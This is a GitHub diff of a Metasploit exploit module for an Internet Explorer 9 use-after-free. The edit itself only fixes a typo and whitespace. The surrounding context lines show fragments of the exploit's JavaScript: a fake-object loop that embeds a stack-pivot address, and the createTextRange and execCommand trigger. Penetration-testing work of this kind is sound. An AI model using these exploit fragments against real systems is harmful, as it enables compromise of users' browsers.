File tree Expand file tree Collapse file tree 1 file changed +3
-3
lines changed
modules/exploits/windows/browser Expand file tree Collapse file tree 1 file changed +3
-3
lines changed Original file line number Diff line number Diff line change @@ -17,7 +17,7 @@ def initialize(info={})
17
17
This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw
18
18
was most likely introduced back in 2013, therefore only certain builds of MSHTML are
19
19
affected. In our testing with IE9, these vulnerable builds appear to be between
20
- 9.0.8112.16496 and 9.0.8112.16533, which implies Auguest 2013 until early March 2014
20
+ 9.0.8112.16496 and 9.0.8112.16533, which implies August 2013 until early March 2014
21
21
(before the patch).
22
22
} ,
23
23
'License' => MSF_LICENSE ,
@@ -106,7 +106,7 @@ def exploit_html
106
106
hxds();
107
107
var fake = "";
108
108
for (var i = 0; i < 12; i++) {
109
- if (i==0) {
109
+ if (i==0) {
110
110
fake += unescape("<%=Rex::Text.to_unescape([target['Pivot']].pack('V*'))%>");
111
111
}
112
112
else {
@@ -123,7 +123,7 @@ def exploit_html
123
123
var element = document.createElement(elements[i]);
124
124
document.body.appendChild(element);
125
125
}
126
-
126
+
127
127
var tRange = document.body.createTextRange();
128
128
tRange.moveToElementText(document.body.children[16]);
129
129
tRange.execCommand('InsertInputSubmit', true, null);
You can’t perform that action at this time.
0 commit comments